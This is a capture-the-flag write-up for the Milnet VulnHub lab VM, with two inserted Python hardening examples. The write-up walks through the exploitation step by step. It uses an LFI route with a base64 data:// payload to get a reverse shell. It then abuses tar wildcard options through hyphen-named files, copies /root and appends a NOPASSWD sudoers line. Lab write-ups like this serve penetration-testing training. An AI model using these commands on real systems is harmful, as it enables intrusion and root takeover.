Milnet – VulnHub CTF Challenge Write Up


This CTF write-up was written while solving the Milnet CTF challenge. Solving CTF challenges helps sharpen your penetration testing skills. VulnHub provides a series of VMs with built-in vulnerabilities.

The Milnet CTF challenge was created by Warrior. You can download the VM from this link. The VM comes in .ova format, which can be imported into VMware or VirtualBox. The starting phase of any CTF is discovering the IP of the VM we are going to pwn. Putting the VM in bridged mode may make it difficult to find the IP it is running on. For my convenience I set it to NAT in my VMware, so that it gets an IP in the range 192.168.200.1/24, which was my NAT range.

The initial step was to find the machine's IP address. The easy way was to use the arp-scan tool:

arp-scan 192.168.200.1/24

This shows all VMs running on the VMware NAT network. I found the IP address of the target VM to be 192.168.200.151.

The next step was an intense scan using nmap:

 
Nmap scan report for 192.168.200.151
Host is up (0.000082s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    lighttpd 1.4.35
MAC Address: 0c:03:27:3B:0E:15 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/

 

The nmap scan showed two services running: SSH and a web server. Some URL fuzzing with DirBuster found a few PHP files. I visited the website, which looks like the screenshot below.

 

I ran nikto against the VM; the results are shown below:

Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.200.151
+ Target Hostname:    192.168.200.151
+ Target Port:        80
+ Start Time:         2017-01-21 03:18:43 (GMT530)
---------------------------------------------------------------------------
+ Server: lighttpd/1.4.35
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST 
+ /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ /info.php?file=http://cirt.net/rfiinc.txt?: Output from the phpinfo() function was found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ 7899 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time:           2017-01-21 03:18:58 (GMT530) (15 seconds)
---------------------------------------------------------------------------

I found an info.php file that gives information about the PHP server. Opening it revealed the following:


allow_url_fopen		On
allow_url_include	On
$_SERVER['DOCUMENT_ROOT']	/var/www/html
$_SERVER['SCRIPT_FILENAME']	/var/www/html/info.php

content.php also showed an RFI vulnerability, so I could include a remote file and execute it. Digging deeper, the index page sends a POST request to content.php with the route parameter route=main, which means there is an LFI vulnerability: the route parameter was the culprit. So I tested it with a simple demo:

route=../../../var/www/html/info

And it worked like a charm. POST data to the server and it gets executed. After reading a lot of LFI techniques, I found that we can send any PHP code by encoding it in base64. The format is as below:

route=data://text/plain;base64,AaBbCcDc==

where AaBbCcDc== is the base64 encoding of our PHP code. I used the PHP reverse shell script from pentest monkey [Pentest Monkey PHP Rev Shell].
I encoded the reverse shell to base64 using https://www.base64encode.org, repeated the Burp request with the encoded data and spawned a reverse shell at 192.168.200.100:443.
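The write-up does not show content.php's source; the assumed vulnerable pattern is include($_POST['route'] . '.php'). As an added example (not the VM's code, written in Python for illustration), this is the allowlist logic that should replace it, plus a check for the two php.ini directives from the phpinfo page that let include() fetch remote or inline code. The route map beyond "main" is an assumption.

```python
import os
import re

# Constructed values matching the write-up's phpinfo output; the route map
# is an assumption (the VM's content.php source is not shown).
DOCUMENT_ROOT = "/var/www/html"
ALLOWED_ROUTES = {"main": "main.php", "props": "props.php", "nav": "nav.php"}
ROUTE_RE = re.compile(r"^[a-z][a-z0-9_]{0,31}$")


def resolve_route(route):
    """Map a 'route' POST value to a file under DOCUMENT_ROOT, or None.

    The value is never used as a path, only as a key into a fixed map, so
    traversal ('../../../var/www/html/info') and stream wrappers
    ('data://...', 'http://...') can never reach include().
    """
    if not isinstance(route, str) or not ROUTE_RE.match(route):
        return None
    filename = ALLOWED_ROUTES.get(route)
    if filename is None:
        return None
    # Defence in depth: even a mapped name must resolve inside DOCUMENT_ROOT.
    path = os.path.normpath(os.path.join(DOCUMENT_ROOT, filename))
    if os.path.commonpath([DOCUMENT_ROOT, path]) != DOCUMENT_ROOT:
        return None
    return path


def risky_php_settings(ini_text):
    """Return the php.ini directives seen On in the write-up's phpinfo that
    make remote/inline includes possible (allow_url_fopen, allow_url_include)."""
    risky = []
    for line in ini_text.splitlines():
        m = re.match(r"^\s*(allow_url_fopen|allow_url_include)\s*=\s*(\w+)", line)
        if m and m.group(2).lower() in ("on", "1", "true"):
            risky.append(m.group(1))
    return risky
```

With allow_url_include Off, the data:// wrapper used above is refused by include() even if the route check were missing.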
Fetching /etc/passwd provided me with the following:


root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/bin/false
messagebus:x:108:111::/var/run/dbus:/bin/false
sshd:x:109:65534::/var/run/sshd:/usr/sbin/nologin
langman:x:1000:1000:T. G. Langman,,,:/home/langman:/bin/bash

I went into the langman folder but found nothing useful.
The next step of the CTF is privilege escalation. This can be done by exploiting a service or an executable that runs with superuser permissions, or by checking whether any root-privileged files are writable by www-data and run as root. Another idea is to check for cron jobs. In my short research I found the following entry in crontab:


# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
*/1 * * * * root /backup/backup.sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

This means the creator set /backup/backup.sh to run every minute. Its contents were:


#!/bin/bash
cd /var/www/html
tar cf /backup/backup.tgz *

But during the initial file search I came across a file named 'DefenseCode_Unix_WildCards_Gone_Wild.txt' inside '/home/langman/SDINET', which is the same as http://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt. It shows how to run commands through tar's wildcard handling.
After a detailed study, I created a temporary exploit file, exploit_code.sh:


www-data@seckenheim:/tmp$ echo "cp -R /root/* /tmp/root; chmod -R 777 /tmp/root" > /var/www/html/exploit_code.sh
echo "cp -R /root/* /tmp/root; chmod -R 777 /tmp/root" > /var/www/html/exploit_code.sh
www-data@seckenheim:/tmp$ cat /var/www/html/exploit_code.sh
cat /var/www/html/exploit_code.sh
cp -R /root/* /tmp/root; chmod -R 777 /tmp/root
www-data@seckenheim:/tmp$ mkdir /tmp/root
mkdir /tmp/root

Then I created two files in /var/www/html using the following commands:

 
touch /var/www/html/--checkpoint=1
touch /var/www/html/--checkpoint-action=exec=sh\ exploit_code.sh

Now /var/www/html shows the following contents:


-rw-r--r-- 1 www-data www-data 0 Jan 23 23:19 --checkpoint-action=exec=sh exploit_code.sh
-rw-r--r-- 1 www-data www-data 0 Jan 23 23:19 --checkpoint=1
-rw-r--r-- 1 root root 73450 Aug 6 2015 bomb.jpg
-rw-r--r-- 1 root root 3901 May 21 18:56 bomb.php
-rw-r--r-- 1 root root 124 May 21 17:50 content.php
-rw-r--r-- 1 www-data www-data 48 May 23 23:18 exploit_code.sh
-rw-r--r-- 1 root root 145 May 21 17:17 index.php
-rw-r--r-- 1 www-data www-data 20 May 21 15:54 info.php
-rw-r--r-- 1 root root 109 May 21 18:53 main.php
-rw-r--r-- 1 root root 18260 Jan 22 2012 mj.jpg
-rw-r--r-- 1 root root 532 May 21 23:33 nav.php
-rw-r--r-- 1 root root 221 May 21 23:33 props.php
-rwxr-xr-x 1 www-data www-data 8 Jan 23 23:15 shell.sh

shell.sh holds the exploit code that should run in order to root the machine. I pasted the following line into shell.sh so that www-data gets root privileges:


echo "www-data ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
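As an added example (not part of the write-up or the VM), this Python routine shows the hardened form of the backup job: it builds the entry list itself, starts tar without a shell, and puts `--` before the names, so entries like the two created above are archived as ordinary files instead of being parsed as options. The demo directory and its file names are constructed; a tar binary is assumed to be on PATH.

```python
import os
import subprocess
import tarfile
import tempfile


def safe_backup(src_dir, archive):
    """Archive every entry of src_dir without letting file names become
    tar options.

    The VM's cron job ran `tar cf /backup/backup.tgz *` from /var/www/html:
    the shell expanded * into argv, so --checkpoint=1 and
    --checkpoint-action=exec=... were parsed as options. Here the list is
    built in Python, no shell is involved, and -- ends option parsing so
    every following argument is a plain file name.
    """
    names = sorted(os.listdir(src_dir))
    if not names:
        return []
    subprocess.run(
        ["tar", "cf", archive, "-C", src_dir, "--", *names], check=True
    )
    return names


def demo():
    """Constructed directory mimicking the hyphen-named files from the
    write-up's /var/www/html listing; returns (archive members, action ran)."""
    src = tempfile.mkdtemp()
    marker = os.path.join(src, "pwned")
    for name in ("index.php", "--checkpoint=1",
                 "--checkpoint-action=exec=touch pwned"):
        open(os.path.join(src, name), "w").close()
    archive = os.path.join(tempfile.mkdtemp(), "backup.tgz")
    safe_backup(src, archive)
    with tarfile.open(archive) as tf:
        members = sorted(tf.getnames())
    # The hyphen-named entries were stored as files and the exec action
    # embedded in the name never ran, so no marker file appeared.
    return members, os.path.exists(marker)
```

The equivalent one-line fix for backup.sh itself is `tar cf /backup/backup.tgz -- *` (or feeding names via `find . -print0 | tar --null -T -`), combined with not letting www-data write to the directory root backs up.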

Now I waited for the cron job to run. After a short break, I did a cd into root and ls showed the following:


www-data@seckenheim:/tmp$ cd root
cd root
www-data@seckenheim:/tmp/root$ ls -l
ls -l
total 4
-rwxrwxrwx 1 root root 1727 Jan 23 23:20 credits.txt
www-data@seckenheim:/tmp/root$ cat credits.txt
cat credits.txt
 ,----,                                                               
      ,/   .`|                                                               
    ,`   .'  :  ,---,                          ,---,.                        
  ;    ;     /,--.' |                        ,'  .' |                  ,---, 
.'___,/    ,' |  |  :                      ,---.'   |      ,---,     ,---.'| 
|    :     |  :  :  :                      |   |   .'  ,-+-. /  |    |   | : 
;    |.';  ;  :  |  |,--.   ,---.          :   :  |-, ,--.'|'   |    |   | | 
`----'  |  |  |  :  '   |  /     \         :   |  ;/||   |  ,"' |  ,--.__| | 
    '   :  ;  |  |   /' : /    /  |        |   :   .'|   | /  | | /   ,'   | 
    |   |  '  '  :  | | |.    ' / |        |   |  |-,|   | |  | |.   '  /  | 
    '   :  |  |  |  ' | :'   ;   /|        '   :  ;/||   | |  |/ '   ; |:  | 
    ;   |.'   |  :  :_:,''   |  / |        |   |    \|   | |--'  |   | '/  ' 
    '---'     |  | ,'    |   :    |        |   :   .'|   |/      |   :    :| 
              `--''       \   \  /         |   | ,'  '---'        \   \  /   
                           `----'          `----'                  `----'    
This was milnet for #vulnhub by @teh_warriar
I hope you enjoyed this vm!

If you liked it drop me a line on twitter or in #vulnhub.

I hope you found the clue:
/home/langman/SDINET/DefenseCode_Unix_WildCards_Gone_Wild.txt
I was sitting on the idea for using this technique for a BOOT2ROOT VM prives for a long time...

This VM was inspired by The Cuckoo's Egg.
If you have not read it give it a try:

 

That's great! Machine rooted. The Milnet VM CTF challenge was completed!

By | 2019-01-16T18:51:03+05:30 April 2nd, 2017|VulnHub|1 Comment
